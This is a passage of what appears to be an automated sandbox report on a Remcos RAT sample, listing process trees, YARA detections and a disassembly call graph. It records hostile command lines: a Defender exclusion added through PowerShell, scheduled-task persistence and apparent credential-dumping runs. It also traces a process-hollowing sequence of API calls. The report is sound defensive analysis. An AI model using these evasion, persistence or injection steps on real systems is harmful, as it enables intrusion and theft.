                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:12:25:31
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                                                                                                                                              Imagebase:0x110000
                                                                                                                                              File size:433'152 bytes
                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:5
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                                                                                                                                              Imagebase:0x240000
                                                                                                                                              File size:187'904 bytes
                                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:7
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:8
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\LdSbZG1iH6.exe"
                                                                                                                                              Imagebase:0x800000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                              Imagebase:0x150000
                                                                                                                                              File size:828'368 bytes
                                                                                                                                              MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:10
                                                                                                                                              Start time:12:25:34
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 68%, ReversingLabs
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:12:25:35
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                                                              File size:496'640 bytes
                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:12
                                                                                                                                              Start time:12:25:37
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
                                                                                                                                              Imagebase:0x240000
                                                                                                                                              File size:187'904 bytes
                                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:12:25:37
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:12:25:37
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                                                                                                                                              Imagebase:0xf70000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:12:26:01
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
                                                                                                                                              Imagebase:0x510000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:12:26:01
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
                                                                                                                                              Imagebase:0xf40000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:12:26:01
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
                                                                                                                                              Imagebase:0x350000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:12:26:01
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12
                                                                                                                                              Imagebase:0x4d0000
                                                                                                                                              File size:483'680 bytes
                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:24
                                                                                                                                              Start time:12:27:01
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 1676
                                                                                                                                              Imagebase:0x4d0000
                                                                                                                                              File size:483'680 bytes
                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:10%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:221
                                                                                                                                                Total number of Limit Nodes:11
                                                                                                                                                execution_graph 38298 f84668 38299 f8467a 38298->38299 38300 f84686 38299->38300 38304 f84779 38299->38304 38309 f83e28 38300->38309 38302 f846a5 38305 f8479d 38304->38305 38313 f84888 38305->38313 38317 f84878 38305->38317 38310 f83e33 38309->38310 38325 f85c44 38310->38325 38312 f86ff6 38312->38302 38314 f848af 38313->38314 38315 f8498c 38314->38315 38321 f844b0 38314->38321 38319 f848af 38317->38319 38318 f8498c 38318->38318 38319->38318 38320 f844b0 CreateActCtxA 38319->38320 38320->38318 38322 f85918 CreateActCtxA 38321->38322 38324 f859db 38322->38324 38326 f85c4f 38325->38326 38329 f85c64 38326->38329 38328 f87165 38328->38312 38330 f85c6f 38329->38330 38333 f85c94 38330->38333 38332 f87242 38332->38328 38334 f85c9f 38333->38334 38337 f85cc4 38334->38337 38336 f87345 38336->38332 38338 f85ccf 38337->38338 38340 f8864b 38338->38340 38343 f8acf8 38338->38343 38339 f88689 38339->38336 38340->38339 38347 f8cde8 38340->38347 38351 f8ad1f 38343->38351 38355 f8ad30 38343->38355 38344 f8ad0e 38344->38340 38348 f8ce19 38347->38348 38349 f8ce3d 38348->38349 38369 f8cfa8 38348->38369 38349->38339 38352 f8ad3f 38351->38352 38359 f8ae28 38351->38359 38364 f8ae18 38351->38364 38352->38344 38357 f8ae28 GetModuleHandleW 38355->38357 38358 f8ae18 GetModuleHandleW 38355->38358 38356 f8ad3f 38356->38344 38357->38356 38358->38356 38360 f8ae5c 38359->38360 38361 f8ae39 38359->38361 38360->38352 38361->38360 38362 f8b060 GetModuleHandleW 38361->38362 38363 f8b08d 38362->38363 38363->38352 38365 f8ae5c 38364->38365 38366 f8ae39 38364->38366 38365->38352 38366->38365 38367 f8b060 GetModuleHandleW 38366->38367 38368 f8b08d 38367->38368 38368->38352 38370 f8cfb5 38369->38370 38371 f8cfef 38370->38371 38373 f8bb60 38370->38373 38371->38349 38374 f8bb65 38373->38374 38376 f8dd08 38374->38376 38377 f8d35c 38374->38377 38376->38376 38378 f8d367 38377->38378 38379 f85cc4 2 API calls 38378->38379 38380 f8dd77 38379->38380 38380->38376 38386 59b807b 38387 59b8081 38386->38387 38392 59ba7ee 38387->38392 38411 59ba790 38387->38411 38429 59ba781 38387->38429 38388 59b808c 38393 59ba77c 38392->38393 38394 59ba7f1 38392->38394 38397 59ba7ce 38393->38397 38447 59bae5d 38393->38447 38452 59bac7d 38393->38452 38457 59babdf 38393->38457 38461 59badfb 38393->38461 38466 59bb21b 38393->38466 38471 59bb467 38393->38471 38476 59bb282 38393->38476 38481 59bad83 38393->38481 38486 59bad48 38393->38486 38491 59bb154 38393->38491 38496 59baf55 38393->38496 38500 59bb0f1 38393->38500 38504 59bad12 38393->38504 38508 59bb233 38393->38508 38512 59bad9d 38393->38512 38394->38388 38397->38388 38412 59ba7aa 38411->38412 38413 59ba7ce 38412->38413 38414 59bb21b 2 API calls 38412->38414 38415 59badfb 2 API calls 38412->38415 38416 59babdf 2 API calls 38412->38416 38417 59bac7d 2 API calls 38412->38417 38418 59bae5d 2 API calls 38412->38418 38419 59bad9d 2 API calls 38412->38419 38420 59bb233 2 API calls 38412->38420 38421 59bad12 2 API calls 38412->38421 38422 59bb0f1 2 API calls 38412->38422 38423 59baf55 2 API calls 38412->38423 38424 59bb154 2 API calls 38412->38424 38425 59bad48 2 API calls 38412->38425 38426 59bad83 2 API calls 38412->38426 38427 59bb282 2 API calls 38412->38427 38428 59bb467 2 API calls 38412->38428 38413->38388 38414->38413 38415->38413 38416->38413 38417->38413 38418->38413 38419->38413 38420->38413 38421->38413 38422->38413 38423->38413 38424->38413 38425->38413 38426->38413 38427->38413 38428->38413 38430 59ba790 38429->38430 38431 59ba7ce 38430->38431 38432 59bb21b 2 API calls 38430->38432 38433 59badfb 2 API calls 38430->38433 38434 59babdf 2 API calls 38430->38434 38435 59bac7d 2 API calls 38430->38435 38436 59bae5d 2 API calls 38430->38436 38437 59bad9d 2 API calls 38430->38437 38438 59bb233 2 API calls 38430->38438 38439 59bad12 2 API calls 38430->38439 38440 59bb0f1 2 API calls 38430->38440 38441 59baf55 2 API calls 38430->38441 38442 59bb154 2 API calls 38430->38442 38443 59bad48 2 API calls 38430->38443 38444 59bad83 2 API calls 38430->38444 38445 59bb282 2 API calls 38430->38445 38446 59bb467 2 API calls 38430->38446 38431->38388 38432->38431 38433->38431 38434->38431 38435->38431 38436->38431 38437->38431 38438->38431 38439->38431 38440->38431 38441->38431 38442->38431 38443->38431 38444->38431 38445->38431 38446->38431 38448 59bae63 38447->38448 38517 59b6f58 38448->38517 38521 59b6f51 38448->38521 38449 59bae90 38449->38397 38453 59bac92 38452->38453 38454 59bac45 38453->38454 38455 59b6f58 ResumeThread 38453->38455 38456 59b6f51 ResumeThread 38453->38456 38454->38397 38455->38454 38456->38454 38525 59b7859 38457->38525 38529 59b7860 38457->38529 38462 59badb4 38461->38462 38463 59badd5 38462->38463 38533 59b7199 38462->38533 38537 59b71a0 38462->38537 38463->38397 38467 59bb0f5 38466->38467 38468 59bb110 38467->38468 38541 59b7008 38467->38541 38545 59b7001 38467->38545 38472 59bb46d 38471->38472 38473 59bb490 38472->38473 38549 59b7288 38472->38549 38553 59b7290 38472->38553 38479 59b7199 WriteProcessMemory 38476->38479 38480 59b71a0 WriteProcessMemory 38476->38480 38477 59bafb5 38477->38476 38478 59bb3c5 38477->38478 38478->38397 38479->38477 38480->38477 38482 59bad89 38481->38482 38484 59b7288 ReadProcessMemory 38482->38484 38485 59b7290 ReadProcessMemory 38482->38485 38483 59bb490 38484->38483 38485->38483 38487 59bad55 38486->38487 38489 59b7288 ReadProcessMemory 38487->38489 38490 59b7290 ReadProcessMemory 38487->38490 38488 59bb490 38489->38488 38490->38488 38492 59bb134 38491->38492 38494 59b7288 ReadProcessMemory 38492->38494 38495 59b7290 ReadProcessMemory 38492->38495 38493 59bb490 38494->38493 38495->38493 38498 59b7199 WriteProcessMemory 38496->38498 38499 59b71a0 WriteProcessMemory 38496->38499 38497 59baf79 38498->38497 38499->38497 38502 59b7008 Wow64SetThreadContext 38500->38502 38503 59b7001 Wow64SetThreadContext 38500->38503 38501 59bb110 38502->38501 38503->38501 38557 59b70d9 38504->38557 38561 59b70e0 38504->38561 38505 59bad33 38510 59b7008 Wow64SetThreadContext 38508->38510 38511 59b7001 Wow64SetThreadContext 38508->38511 38509 59bb24d 38510->38509 38511->38509 38513 59bada3 38512->38513 38515 59b7199 WriteProcessMemory 38513->38515 38516 59b71a0 WriteProcessMemory 38513->38516 38514 59badd5 38514->38397 38515->38514 38516->38514 38518 59b6f98 ResumeThread 38517->38518 38520 59b6fc9 38518->38520 38520->38449 38522 59b6f5d ResumeThread 38521->38522 38524 59b6fc9 38522->38524 38524->38449 38526 59b7865 CreateProcessA 38525->38526 38528 59b7aab 38526->38528 38528->38528 38530 59b78e9 CreateProcessA 38529->38530 38532 59b7aab 38530->38532 38532->38532 38534 59b71a5 WriteProcessMemory 38533->38534 38536 59b723f 38534->38536 38536->38463 38538 59b71e8 WriteProcessMemory 38537->38538 38540 59b723f 38538->38540 38540->38463 38542 59b704d Wow64SetThreadContext 38541->38542 38544 59b7095 38542->38544 38544->38468 38546 59b704d Wow64SetThreadContext 38545->38546 38548 59b7095 38546->38548 38548->38468 38550 59b72db ReadProcessMemory 38549->38550 38552 59b731f 38550->38552 38552->38473 38554 59b72db ReadProcessMemory 38553->38554 38556 59b731f 38554->38556 38556->38473 38558 59b7120 VirtualAllocEx 38557->38558 38560 59b715d 38558->38560 38560->38505 38562 59b7120 VirtualAllocEx 38561->38562 38564 59b715d 38562->38564 38564->38505 38381 59bbcca 38382 59bbc84 PostMessageW 38381->38382 38385 59bbcd3 38381->38385 38384 59bbca4 38382->38384 38565 7a37bc0 38566 7a37c03 38565->38566 38567 7a37c21 MonitorFromPoint 38566->38567 38568 7a37c52 38566->38568 38567->38568 38569 f8d710 DuplicateHandle 38570 f8d7a6 38569->38570 38571 f8d0c0 38572 f8d106 GetCurrentProcess 38571->38572 38574 f8d158 GetCurrentThread 38572->38574 38575 f8d151 38572->38575 38576 f8d18e 38574->38576 38577 f8d195 GetCurrentProcess 38574->38577 38575->38574 38576->38577 38580 f8d1cb 38577->38580 38578 f8d1f3 GetCurrentThreadId 38579 f8d224 38578->38579 38580->38578 38581 7a33f98 38583 7a33fe6 DrawTextExW 38581->38583 38584 7a3403e 38583->38584

                                                                                                                                                Executed Functions

                                                                                                                                                Function 07A3AA60 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 295 7a3aa60-7a3aa81 296 7a3aa83 295->296 297 7a3aa88-7a3ab74 295->297 296->297 299 7a3b3a3-7a3b3cb 297->299 300 7a3ab7a-7a3acce 297->300 303 7a3baac-7a3bab5 299->303 344 7a3b371-7a3b3a0 300->344 345 7a3acd4-7a3ad2f 300->345 304 7a3babb-7a3bad2 303->304 305 7a3b3d9-7a3b3e2 303->305 307 7a3b3e4 305->307 308 7a3b3e9-7a3b4dd 305->308 307->308 326 7a3b507 308->326 327 7a3b4df-7a3b4eb 308->327 331 7a3b50d-7a3b52d 326->331 329 7a3b4f5-7a3b4fb 327->329 330 7a3b4ed-7a3b4f3 327->330 332 7a3b505 329->332 330->332 336 7a3b52f-7a3b55d 331->336 337 7a3b58d-7a3b605 331->337 332->331 342 7a3b569-7a3b588 336->342 355 7a3b607-7a3b65a 337->355 356 7a3b65c-7a3b69f 337->356 349 7a3baa9 342->349 344->299 352 7a3ad31 345->352 353 7a3ad34-7a3ad3f 345->353 349->303 352->353 357 7a3b283-7a3b289 353->357 385 7a3b6aa-7a3b6b0 355->385 356->385 359 7a3ad44-7a3ad62 357->359 360 7a3b28f-7a3b30c 357->360 362 7a3ad64-7a3ad68 359->362 363 7a3adb9-7a3adce 359->363 399 7a3b35b-7a3b361 360->399 362->363 368 7a3ad6a-7a3ad75 362->368 365 7a3add0 363->365 366 7a3add5-7a3adeb 363->366 365->366 370 7a3adf2-7a3ae09 366->370 371 7a3aded 366->371 372 7a3adab-7a3adb1 368->372 376 7a3ae10-7a3ae26 370->376 377 7a3ae0b 370->377 371->370 374 7a3adb3-7a3adb4 372->374 375 7a3ad77-7a3ad7b 372->375 379 7a3ae37-7a3aea8 374->379 381 7a3ad81-7a3ad99 375->381 382 7a3ad7d 375->382 383 7a3ae28 376->383 384 7a3ae2d-7a3ae34 376->384 377->376 389 7a3aeaa 379->389 390 7a3aebe-7a3b036 379->390 386 7a3ada0-7a3ada8 381->386 387 7a3ad9b 381->387 382->381 383->384 384->379 388 7a3b707-7a3b713 385->388 386->372 387->386 393 7a3b6b2-7a3b6d4 388->393 394 7a3b715-7a3b79b 388->394 389->390 392 7a3aeac-7a3aeb8 389->392 400 7a3b038 390->400 401 7a3b04c-7a3b187 390->401 392->390 396 7a3b6d6 393->396 397 7a3b6db-7a3b704 393->397 421 7a3b920-7a3b929 394->421 396->397 397->388 404 7a3b363-7a3b369 399->404 405 7a3b30e-7a3b358 399->405 400->401 406 7a3b03a-7a3b046 400->406 414 7a3b1eb-7a3b200 401->414 415 7a3b189-7a3b18d 401->415 404->344 405->399 406->401 418 7a3b202 414->418 419 7a3b207-7a3b228 414->419 415->414 416 7a3b18f-7a3b19e 415->416 420 7a3b1dd-7a3b1e3 416->420 418->419 423 7a3b22a 419->423 424 7a3b22f-7a3b24e 419->424 427 7a3b1a0-7a3b1a4 420->427 428 7a3b1e5-7a3b1e6 420->428 429 7a3b7a0-7a3b7b5 421->429 430 7a3b92f-7a3b988 421->430 423->424 425 7a3b250 424->425 426 7a3b255-7a3b275 424->426 425->426 433 7a3b277 426->433 434 7a3b27c 426->434 431 7a3b1a6-7a3b1aa 427->431 432 7a3b1ae-7a3b1cf 427->432 437 7a3b280 428->437 435 7a3b7b7 429->435 436 7a3b7be-7a3b914 429->436 452 7a3b98a-7a3b9bd 430->452 453 7a3b9bf-7a3b9e9 430->453 431->432 439 7a3b1d1 432->439 440 7a3b1d6-7a3b1da 432->440 433->434 434->437 435->436 441 7a3b893-7a3b8d3 435->441 442 7a3b7c4-7a3b804 435->442 443 7a3b809-7a3b849 435->443 444 7a3b84e-7a3b88e 435->444 457 7a3b91a 436->457 437->357 439->440 440->420 441->457 442->457 443->457 444->457 461 7a3b9f2-7a3ba9d 452->461 453->461 457->421 461->349
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                                                                • API String ID: 0-2576840827
                                                                                                                                                • Opcode ID: e22866a6ea9421acb4f0988994276ff99292595c305ffb6bfae1232f122cea23
                                                                                                                                                • Instruction ID: 1304db3d6c41bec6ec92ee8c4a13e57408748d7d9049ff038b973c9a83dc3fb2
                                                                                                                                                • Opcode Fuzzy Hash: e22866a6ea9421acb4f0988994276ff99292595c305ffb6bfae1232f122cea23
                                                                                                                                                • Instruction Fuzzy Hash: C1B2C5B5E00628CFDB54CF69C984AD9BBB2FF89304F1581E5E419AB225DB319E81CF50
                                                                                                                                                Function 059BC9D0 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d9f356317d1a324a6e0c7a483d410a2d42e3a01318eb5d44ca9417765a562ba1
                                                                                                                                                • Instruction ID: 1c7664dc46c21af936525321afe10ad192f18633305ecde7b8809b9b368c1966
                                                                                                                                                • Opcode Fuzzy Hash: d9f356317d1a324a6e0c7a483d410a2d42e3a01318eb5d44ca9417765a562ba1
                                                                                                                                                • Instruction Fuzzy Hash: 99E1CB707016058FFB29EB65C650BAEB7FAEF89700F14446AE1069B395CB79EC01CB51
                                                                                                                                                Function 07A3D708 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
